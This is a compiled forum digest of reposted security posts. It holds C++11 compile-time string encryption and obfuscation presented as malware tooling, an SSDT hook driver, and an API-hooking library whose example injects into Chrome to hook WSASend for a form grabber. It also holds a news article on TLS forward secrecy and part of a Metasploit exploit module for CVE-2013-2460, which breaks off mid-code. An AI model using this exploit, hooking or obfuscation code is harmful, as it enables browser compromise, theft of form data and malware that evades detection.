  15. [h=1]Malware related compile-time hacks with C++11[/h]by LeFF Hello, community! This code shows how some features of the new C++11 standard can be used to randomly and automaticaly obfuscate code for every build you make (so for every build you will have different hash-values, different encrypted strings and so on)... I decided to show examples on random code generation, string hashing and string encryption only, as more complex ones gets much harder to read... Code is filled with comments and pretty self-explanatory, but if you have some questions, feel free to ask... Hope this stuff will be useful for you, guys! #include <stdio.h> #include <stdint.h> //-------------------------------------------------------------// // "Malware related compile-time hacks with C++11" by LeFF // // You can use this code however you like, I just don't really // // give a shit, but if you feel some respect for me, please // // don't cut off this comment when copy-pasting... ;-) // //-------------------------------------------------------------// // Usage examples: void exampleRandom1() __attribute__((noinline)); void exampleRandom2() __attribute__((noinline)); void exampleHashing() __attribute__((noinline)); void exampleEncryption() __attribute__((noinline)); #ifndef vxCPLSEED // If you don't specify the seed for algorithms, the time when compilation // started will be used, seed actually changes the results of algorithms... #define vxCPLSEED ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \ (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \ (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000) #endif // The constantify template is used to make sure that the result of constexpr // function will be computed at compile-time instead of run-time template <uint32_t Const> struct vxCplConstantify { enum { Value = Const }; }; // Compile-time mod of a linear congruential pseudorandom number generator, // the actual algorithm was taken from "Numerical Recipes" book constexpr uint32_t vxCplRandom(uint32_t Id) { return (1013904223 + 1664525 * ((Id > 0) ? (vxCplRandom(Id - 1)) : (vxCPLSEED))) & 0xFFFFFFFF; } // Compile-time random macros, can be used to randomize execution // path for separate builds, or compile-time trash code generation #define vxRANDOM(Min, Max) (Min + (vxRAND() % (Max - Min + 1))) #define vxRAND() (vxCplConstantify<vxCplRandom(__COUNTER__ + 1)>::Value) // Compile-time recursive mod of string hashing algorithm, // the actual algorithm was taken from Qt library (this // function isn't case sensitive due to vxCplTolower) constexpr char vxCplTolower(char Ch) { return (Ch >= 'A' && Ch <= 'Z') ? (Ch - 'A' + 'a') : (Ch); } constexpr uint32_t vxCplHashPart3(char Ch, uint32_t Hash) { return ((Hash << 4) + vxCplTolower(Ch)); } constexpr uint32_t vxCplHashPart2(char Ch, uint32_t Hash) { return (vxCplHashPart3(Ch, Hash) ^ ((vxCplHashPart3(Ch, Hash) & 0xF0000000) >> 23)); } constexpr uint32_t vxCplHashPart1(char Ch, uint32_t Hash) { return (vxCplHashPart2(Ch, Hash) & 0x0FFFFFFF); } constexpr uint32_t vxCplHash(const char* Str) { return (*Str) ? (vxCplHashPart1(*Str, vxCplHash(Str + 1))) : (0); } // Compile-time hashing macro, hash values changes using the first pseudorandom number in sequence #define vxHASH(Str) (uint32_t)(vxCplConstantify<vxCplHash(Str)>::Value ^ vxCplConstantify<vxCplRandom(1)>::Value) // Compile-time generator for list of indexes (0, 1, 2, ...) 
template <uint32_t...> struct vxCplIndexList {}; template <typename IndexList, uint32_t Right> struct vxCplAppend; template <uint32_t... Left, uint32_t Right> struct vxCplAppend<vxCplIndexList<Left...>, Right> { typedef vxCplIndexList<Left..., Right> Result; }; template <uint32_t N> struct vxCplIndexes { typedef typename vxCplAppend<typename vxCplIndexes<N - 1>::Result, N - 1>::Result Result; }; template <> struct vxCplIndexes<0> { typedef vxCplIndexList<> Result; }; // Compile-time string encryption of a single character const char vxCplEncryptCharKey = vxRANDOM(0, 0xFF); constexpr char vxCplEncryptChar(const char Ch, uint32_t Idx) { return Ch ^ (vxCplEncryptCharKey + Idx); } // Compile-time string encryption class template <typename IndexList> struct vxCplEncryptedString; template <uint32_t... Idx> struct vxCplEncryptedString<vxCplIndexList<Idx...> > { char Value[sizeof...(Idx) + 1]; // Buffer for a string // Compile-time constructor constexpr inline vxCplEncryptedString(const char* const Str) : Value({ vxCplEncryptChar(Str[Idx], Idx)... }) {} // Run-time decryption char* decrypt() { for(uint32_t t = 0; t < sizeof...(Idx); t++) { this->Value[t] = this->Value[t] ^ (vxCplEncryptCharKey + t); } this->Value[sizeof...(Idx)] = '\0'; return this->Value; } }; // Compile-time string encryption macro #define vxENCRYPT(Str) (vxCplEncryptedString<vxCplIndexes<sizeof(Str) - 1>::Result>(Str).decrypt()) // A small random code path example void exampleRandom1() { switch(vxRANDOM(1, 4)) { case 1: { printf("exampleRandom1: Code path 1!\n"); break; } case 2: { printf("exampleRandom1: Code path 2!\n"); break; } case 3: { printf("exampleRandom1: Code path 3!\n"); break; } case 4: { printf("exampleRandom1: Code path 4!\n"); break; } default: { printf("Fucking poltergeist!\n"); } } } // A small random code generator example void exampleRandom2() { volatile uint32_t RndVal = vxRANDOM(0, 100); if(vxRAND() % 2) { RndVal += vxRANDOM(0, 100); } else { RndVal -= vxRANDOM(0, 200); } printf("exampleRandom2: %d\n", RndVal); } // A small string hasing example void exampleHashing() { printf("exampleHashing: 0x%08X\n", vxHASH("hello world!")); printf("exampleHashing: 0x%08X\n", vxHASH("HELLO WORLD!")); } void exampleEncryption() { printf("exampleEncryption: %s\n", vxENCRYPT("Hello world!")); } extern "C" void Main() { exampleRandom1(); exampleRandom2(); exampleHashing(); exampleEncryption(); } To build code with GCC/MinGW I used this command: g++ -o main.exe -m32 -std=c++0x -Wall -O3 -Os -fno-exceptions -fno-rtti -flto -masm=intel -e_Main -nostdlib -O3 -Os -flto -s main.cpp -lmsvcrt Compiled binary returs this, as expected: exampleRandom1: Code path 2! exampleRandom2: 145 exampleHashing: 0x2D13947A exampleHashing: 0x2D13947A exampleEncryption: Hello world! Decompiled code, that was generated by compiler: exampleRandom1 proc near var_18= dword ptr -18h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!" 
call puts leave retn exampleRandom1 endp exampleRandom2 proc near var_28= dword ptr -28h var_24= dword ptr -24h var_C= dword ptr -0Ch push ebp mov ebp, esp sub esp, 28h mov [ebp+var_C], 78 mov eax, [ebp+var_C] mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n" add eax, 67 mov [ebp+var_C], eax mov eax, [ebp+var_C] mov [esp+28h+var_24], eax call printf leave retn exampleRandom2 endp exampleHashing proc near var_18= dword ptr -18h var_14= dword ptr -14h push ebp mov ebp, esp sub esp, 18h mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf mov [esp+18h+var_14], 2D13947Ah mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n" call printf leave retn exampleHashing endp exampleEncryption proc near var_28= dword ptr -28h var_24= dword ptr -24h var_15= byte ptr -15h var_14= byte ptr -14h var_13= byte ptr -13h var_12= byte ptr -12h var_11= byte ptr -11h var_10= byte ptr -10h var_F= byte ptr -0Fh var_E= byte ptr -0Eh var_D= byte ptr -0Dh var_C= byte ptr -0Ch var_B= byte ptr -0Bh var_A= byte ptr -0Ah var_9= byte ptr -9 push ebp xor eax, eax mov ebp, esp mov ecx, 0Dh push edi lea edi, [ebp+var_15] sub esp, 24h rep stosb xor eax, eax mov [ebp+var_15], 4Ah mov [ebp+var_14], 66h mov [ebp+var_13], 68h mov [ebp+var_12], 69h mov [ebp+var_11], 69h mov [ebp+var_10], 27h mov [ebp+var_F], 7Fh mov [ebp+var_E], 66h mov [ebp+var_D], 78h mov [ebp+var_C], 67h mov [ebp+var_B], 68h mov [ebp+var_A], 2Ch loc_401045: lea ecx, [eax+2] xor [ebp+eax+var_15], cl inc eax cmp eax, 0Ch lea edx, [ebp+var_15] jnz short loc_401045 mov [esp+28h+var_24], edx mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n" mov [ebp+var_9], 0 call printf add esp, 24h pop edi pop ebp retn exampleEncryption endp [h=4]Attached Files[/h] main.rar 650bytes 68 downloads Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums
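A side note for analysts (not from the original post): if a sample uses the vxCplHash scheme above to obfuscate string comparisons, the same hash is easy to recompute at run time when building a lookup table of candidate strings. A minimal Python sketch of the algorithm follows; note that the vxHASH macro additionally XORs the result with a per-build random constant derived from the compile-time seed, which is not reproduced here and would have to be recovered from the sample itself.

# Minimal sketch: run-time equivalent of the vxCplHash constexpr function above.
def vx_hash(s):
    h = 0
    for ch in reversed(s.lower()):      # the constexpr recursion consumes the string from the end
        h = (h << 4) + ord(ch)          # vxCplHashPart3
        h ^= (h & 0xF0000000) >> 23     # vxCplHashPart2
        h &= 0x0FFFFFFF                 # vxCplHashPart1
    return h

# Case-insensitive by construction, so both calls print the same value,
# mirroring the two identical lines in the exampleHashing() output above.
print(hex(vx_hash("hello world!")))
print(hex(vx_hash("HELLO WORLD!")))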
  16. [h=1]My first SSDT hook driver[/h]by zwclose7

Hello, this is my first SSDT hook driver. My driver will hook NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey.

NtTerminateProcess hook: This hook will protect any process named calc.exe from being terminated.
NtLoadDriver hook: This hook will display the driver name in the debugger/DebugView.
NtOpenProcess hook: This hook will deny access to any process named cmd.exe, and will return STATUS_ACCESS_DENIED if the process name matches.
NtDeleteValueKey hook: This hook will protect any value named abcdef from being deleted.

To load the driver, run loader.exe in the release folder. This program will install the driver on the system, and then load it. All functions will be unhooked when the driver unloads.

[h=4]Attached Files[/h] SSDTHook.zip 287.99K 39 downloads

Sursa: My first SSDT hook driver - rohitab.com - Forums zwclose7
  17. [h=1]ExtendedHook Functions c++[/h]By RosDevil

[intro]
I decided to give away one of my master sources, a bunch of functions that are really useful for hooking APIs (or any address) on x86 machines. (I'm writing an x64 version; it will be published as soon as possible.)

ExtendedHook.h 1.46K 17 downloads
ExtendedHook.cpp 3.21K 9 downloads

[index]
This page is divided as follows:
- Function Documentation
- EHOOKSTRUCT structure
- Usage
- Compiler settings and notes to remember
- Example 1# - hooking MessageBox
- Example 2# - hooking DirectX (version 9 in this case)
- Example 3# - hooking WSASend

[Functions Documentation]
There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UninstallEHook).

//InstallEHook
bool InstallEHook( LPCSTR API, LPCTSTR lib, PEHOOKSTRUCT EHookA, void * redit );

PARAMETERS
LPCSTR API: the name of the API
LPCTSTR lib: module name or path
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

REMARKS
This function first tries to get the module through GetModuleHandle of the given dll name or path; if that fails, it tries LoadLibrary.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//InstallEHookEx
bool InstallEHookEx( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit );

PARAMETERS
void * TargetAddress: in this case you give the address of the function to hook. This function is needed especially when you want to hook a function for which you only have the address, not the definition. (See Example 2# to understand better)
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//CustomEHook
bool CustomEHook( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit, unsigned int bytes_jmp );

PARAMETERS
void * TargetAddress: the address of the function to hook (as with InstallEHookEx).
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.
unsigned int bytes_jmp: the number of bytes that must be copied to perform the hook. This function is meant for the addresses of unusual APIs whose beginning signature the functions above don't recognize; mostly you will use it when trying to hook an address in the middle of an API, not at the beginning.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

REMARKS
This function can easily crash if you are not careful: it does not check anything, and if the given byte count does not fall on the end of a complete instruction you won't be able to call the original API - if you do, it will crash.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//UninstallEHook
void * UninstallEHook( PEHOOKSTRUCT EHookA );

PARAMETER
PEHOOKSTRUCT EHookA: pointer to the EHOOKSTRUCT whose hook should be uninstalled.

RETURN VALUE
If the function succeeds it returns the original address of the API, otherwise NULL.

[EHOOKSTRUCT structure]
This structure is the core of these functions.

typedef struct _EHOOKSTRUCT{
DWORD * adr_init;
DWORD * adr_redirect;
DWORD * adr_new_api;
DWORD bytes_size;
}EHOOKSTRUCT, *PEHOOKSTRUCT;

MEMBERS
DWORD * adr_init: Stores the original address
DWORD * adr_redirect: Stores the address of the hook function
DWORD * adr_new_api: Stores the address of the NEW API
DWORD bytes_size: Number of bytes copied to perform the hook

[usage]
This is a general summary of how to use these functions. It's easier if you look at the examples.

#include "ExtendedHook.h"

typedef -type- ( -Api Prototype- ) ( -parameters- );
EHOOKSTRUCT api_tohook;

//define a function exactly matching the prototype
-type- Api_function_hook ( -parameters- );

-type- Api_function_hook ( -parameters- ){
//here you can manage the parameters
return ((-Api Prototype-)api_tohook.adr_new_api) (- parameters -); //perform the call with any parameters you want, the original ones or changed ones
}

int main(){
if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){
printf("Error hooking");
return 1;
}
return 0;
}

[Compiler settings and notes to remember]
This hooking method requires one change in the compiler settings.
- Disable intrinsic functions [VC++]
Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No]

Notes
- When you define the function prototype and its hook function, they must match the original API exactly - no changes in the parameter count - and remember to put WINAPI (__stdcall) in the definition when it is needed, otherwise it won't work.
- There are some APIs that are needed by every other API, like GetModuleHandle, GetProcAddress, LoadLibrary... if you want to hook these APIs, remember not to call any other API inside the hook function that requires them, otherwise you will end up in an infinite loop.

[Example 1# - hooking MessageBox]

#include "stdafx.h"
#include "windows.h"
#include <iostream>
#include "ExtendedHook.h"

using namespace std;

typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype
int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function hook

EHOOKSTRUCT myApi; //essential structure
pMessageBox myMessageBox = NULL; //optional, but i think it is useful

int _tmain(int argc, _TCHAR* argv[])
{
if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){
wcout<<"Error hooking"<<endl;
return 1;
}
myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook
myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING);
if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) {//this will be hooked!
wcout<<"You have pressed yes"<<endl; }else{ wcout<<"You have pressed no"<<endl; } UninstallEHook(&myApi); cin.get(); return 0; } int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){ wcout<<"-- MessageBoxW hooked!"<<endl; wcout<<"HWND: "<<myhandle<<endl; wcout<<"Text: "<<text<<endl; wcout<<"Caption: "<<caption<<endl; wcout<<"Buttons/Icon: "<<types<<endl; return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types); } [Example 2# - hooking DirectX (version 9 in this case)] This is an cool example, a dll that must be injected from the very beginning of the game. If you delve into DirectX hooking you will know what i'm talking about. It has been tested on Age of Empires 3 (x86). //AgeOfEmpireHook.dll #include "stdafx.h" #include "windows.h" #include "d3dx9.h" #include "ExtendedHook.h" #pragma comment(lib, "d3dx9.lib") void start_hooking(); void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height); int times_load = 0; typedef DWORD D3DCOLOR; IDirect3DDevice9 * DeviceInterface; //hook Direct3DCreate9 typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion); EHOOKSTRUCT api_Direct3DCreate9; IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion); //hook CreateDevice typedef HRESULT (APIENTRY * pCreateDevice)( IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface ); EHOOKSTRUCT api_CreateDevice; HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface); //Hook EndScene typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter); EHOOKSTRUCT api_EndScene; HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){ MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING); } return; } IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){ IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion); _asm pushad DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE if (times_load == 1){ //the first time d3d9.dll is used, isn't for the game making, we need the second InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook); } times_load += 1; _asm popad return pDev; } HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){ HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); _asm pushad DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene _asm popad return final; } HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){ _asm pushad WriteText(pDevInter, L"AGE OF 
EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50); if (GetAsyncKeyState(VK_F1))WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100); _asm popad return ((pEndScene)api_EndScene.adr_new_api)(pDevInter); } void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){ ID3DXFont *m_font; D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font ); D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0); RECT space; space.top = y; space.left = x; space.right = width + x; space.bottom = height + y; m_font->DrawText(NULL, text, -1, &space, 0, fontColor1); m_font->Release(); } [Example 3# - hooking WSASend] This example is again a dll, but doesn't require to be injected at the very beginning since the function that we are going to hook doesn't belong to a any class. It has been tested on Chrome to create a FormGrabber. //ChromeHook.dll #include "stdafx.h" #include "windows.h" #include "ExtendedHook.h" bool first = true; void start_hooking(); //I don't want to include all winsock.h so let's declare want we need: //(you can include winsock.h, it's quicker) typedef unsigned int SOCKET; typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE; typedef struct __WSABUF { unsigned long len; char FAR *buf; } WSABUF, *LPWSABUF; typedef struct _WSAOVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; }; PVOID Pointer; }; HANDLE hEvent; } WSAOVERLAPPED, *LPWSAOVERLAPPED; //hook WSASend typedef int (WINAPI * pWSASend)( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); EHOOKSTRUCT api_WSASend; int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook)==false){ MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING); } } int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ){ _asm pushad if (first == true){ //only show the first time a call is intercepted MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK); first = false; } //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all it's parameters! //... your code man ... _asm popad return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine); } Well, we're done! PUT LIKE IF YOU APPRECIATE I've updated my ExtendedHook.cpp, there were a little bug about the bytes to copy. [see attachment] RosDevil Sursa: ExtendedHook Functions c++ - rohitab.com - Forums
  18. [h=1]A simple SSL tweak could protect you from GCHQ/NSA snooping[/h][h=2]It might slow you down, but hey, you can't have everything[/h] By John Leyden, 26th June 2013 An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ. Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials. Several key exchange mechanisms exist but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys. "This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns. This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL encrypted traffic, given a server’s private keys. This feature has become a serious liability in the era of mass surveillance. GCHQ have been secretly tapping hundreds of fibre-optic cables to tap data, The Guardian reported last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre optic networks. Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order. The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues. "Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything." The Diffie–Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie–Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy. 
"Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session." Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial scale snooping. SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading to a decision by many website operators to disable the feature in order to get better performance. "In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages. The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers and adding DHE allows Forward Secrecy to be offered to the rest. A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, a well as providing a good explanation about the technology is beneficial for privacy - as well as noting the limitations of the technique. "Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys." "Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. "In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases. "Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes. Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice. Whether sysadmins switch to more privacy-friendly key exchange methods in spite of performance drawbacks is by no means sure, but publicising the issue at least gives them the chance to decide for themselves. ® Sursa: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register
  19. Java Applet ProviderSkeleton Insecure Invoke Method

Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com

This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class, which allows arbitrary static methods to be called with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  EXPLOIT_STRING = "Exploit"

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',
      'Description' => %q{
        This module abuses the insecure invoke() method of the ProviderSkeleton
        class that allows to call arbitrary static methods with user supplied
        arguments. The vulnerability affects Java version 7u21 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Adam Gowdiak',    # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser'  # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
      'Platform' => [ 'java', 'win', 'osx', 'linux' ],
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 18 2013'
    ))
  end

  def randomize_identifier_in_jar(jar, identifier)
    identifier_str = rand_text_alpha(identifier.length)
    jar.entries.each { |entry|
      entry.name.gsub!(identifier, identifier_str)
      entry.data = entry.data.gsub(identifier, identifier_str)
    }
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
    @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
    @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
